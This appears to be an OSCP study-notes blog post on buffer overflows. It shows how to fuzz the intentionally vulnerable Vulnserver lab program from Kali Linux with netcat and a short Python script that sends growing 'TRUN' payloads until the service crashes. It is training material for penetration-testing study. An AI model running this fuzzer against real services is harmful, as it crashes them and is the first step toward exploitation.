OSCP Learning Notes - Buffer Overflows(1)

博客介绍了缓冲区溢出相关内容,包括内存和栈的剖析、模糊测试。还提及了测试工具Vulnserver和Immunity Debuger。详细说明了在Windows系统打开Vulnserver程序,从Kali Linux连接并编写Python模糊测试脚本,最终导致Vulnserver崩溃的测试过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Introduction to Buffer Overflows

Anatomy of Memory

Anatomy of the Stack

Fuzzing

Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver

           Immunity Debuger - https://www.immunityinc.com/products/debugger/

Vulnserver Test

1. Open the vulnserver program on windows os.

2. Connect to the vulnserver from Kali Linux.

nc -nv 10.0.0.XX 9999

 

3.Write the Python fuzzer test script on Kali Linux

 1 #!/usr/bin/python
 2 import socket
 3 import sys
 4 
 5 buffer=["A"]
 6 counter=100
 7 while len(buffer) <= 30:
 8     buffer.append("A"*counter)
 9     counter=counter+200
10 
11 for string in buffer:
12     print "Fuzzing vulnserver with %s bytes" % len(string)
13     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
14     connect=s.connect(('10.0.0.XX',9999))
15     s.send('TRUN /.:/' + string)
16     s.close()

Grant the rights to the script file and execute the fuzzer.py.

chmod 777 fuzzer.py
./fuzzer.py

The vulnserver crashed with 5900 bytes.

Immunity Debuger

 GUI Screenshoot

 

Open or attach the vulnserver program.

 

Perform the fuzzer.py on Kali Linux.

./fuzzer.py

 

The vulnserver crashed finally.

 

转载于:https://www.cnblogs.com/keepmoving1113/p/11074706.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值